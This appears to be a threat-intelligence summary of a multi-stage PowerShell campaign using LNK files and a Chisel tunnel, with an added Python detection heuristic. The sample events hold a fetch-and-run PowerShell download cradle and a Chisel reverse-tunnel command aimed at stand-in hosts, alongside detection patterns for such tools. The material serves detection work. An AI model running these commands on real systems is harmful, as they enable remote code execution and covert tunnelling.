Dissecting A Multi-Stage PowerShell Campaign Using Chisel
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY :
A multi-stage PowerShell campaign has been identified in which an LNK file launches a sequence of obfuscated scripts. The scripts establish persistence, communicate with a command-and-control (C&C) server and execute the commands it returns. For covert communication the campaign uses Chisel, an open-source TCP/UDP tunnelling tool that carries its traffic over HTTP, together with a Netskope proxy, which also enables lateral movement inside the compromised network. Three stages of PowerShell scripts are involved, each with a specific role: establishing persistence, communicating with the C&C server, and executing the received commands. The presence of a Chisel DLL points to a threat actor seeking prolonged control and evasion, consistent with a well-organised or financially motivated operation.
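As an added illustration of how a defender might hunt for the two behaviours named in this summary (an LNK-launched, obfuscated PowerShell stage and a Chisel reverse tunnel), the following Python heuristic is run over a few constructed process-creation events. It is example code written for this page, not code from the report or from NetmanageIT. The Sysmon-style field names (ParentImage, Image, CommandLine), the choice of explorer.exe as the parent of a double-clicked LNK, the flag patterns and the sample events (with .invalid hostnames) are all assumptions, not indicators from the campaign.

```python
"""Heuristic triage for two behaviours named in the summary: an LNK-launched,
obfuscated PowerShell stage and a Chisel reverse tunnel.

Added example, not code from the report. Assumptions: Sysmon-style
process-creation fields (ParentImage, Image, CommandLine), explorer.exe as the
parent of an LNK double-click, and constructed sample events."""
import base64
import re
import shlex
from typing import List, Optional, Tuple

# PowerShell switches that a user-facing shortcut rarely needs but stagers use.
PS_STEALTH_FLAGS = re.compile(
    r"(?i)-(?:nop|noprofile|w\s+hidden|windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b")
PS_ENC_FLAG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)")
# chisel client syntax is "client <server-url> R:<remote>"; matching the argument
# shape rather than the binary name survives a renamed or DLL-hosted client.
CHISEL_REVERSE = re.compile(r"(?i)\bclient\b.*\bhttps?://\S+.*\bR:\S+")
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b")

Event = dict
Finding = Tuple[str, Event, str]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or None when the argument is absent or undecodable."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes in the command line
        argv = cmdline.split()
    for i, tok in enumerate(argv[:-1]):
        if PS_ENC_FLAG.fullmatch(tok):
            try:
                return base64.b64decode(argv[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: List[Event]) -> List[Finding]:
    """Return (rule, event, detail) for each event that matches a heuristic."""
    findings: List[Finding] = []
    for ev in events:
        image, parent, cmd = _basename(ev["Image"]), _basename(ev["ParentImage"]), ev["CommandLine"]
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            stealthy = PS_STEALTH_FLAGS.search(cmd) is not None
            if parent == "explorer.exe" and (decoded is not None or stealthy):
                # Shape of a double-clicked LNK launching a hidden or encoded stage.
                findings.append(("lnk_powershell_launcher", ev, decoded or cmd))
            elif decoded is not None and DOWNLOAD_CRADLE.search(decoded):
                # A later stage fetching the next script from its server.
                findings.append(("powershell_download_stage", ev, decoded))
        if CHISEL_REVERSE.search(cmd):
            findings.append(("chisel_reverse_tunnel", ev, cmd))
    return findings


# Constructed sample events; the .invalid hostnames are not indicators.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/s2.ps1')"
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(STAGE1)},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\Public\update.exe",  # renamed chisel client (assumed)
     "CommandLine": "update.exe client https://relay.invalid:8443 R:socks"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # ordinary admin shortcut, not flagged
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoLogo -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for rule, ev, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:28s} {_basename(ev['ParentImage'])} -> {_basename(ev['Image'])}: {detail}")
```

The Chisel rule deliberately keys on the reverse-tunnel argument shape (client URL followed by an R: remote) rather than on the file name, because the summary notes the tunnel shipped as a DLL; a name-based rule would miss a renamed or hosted client. The decoder is what turns an -EncodedCommand blob back into the stage-1 script so the download cradle can be read.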
OPENCTI LABELS :
powershell,command-and-control,lateral movement,lnk file,multi-stage,chisel,persistence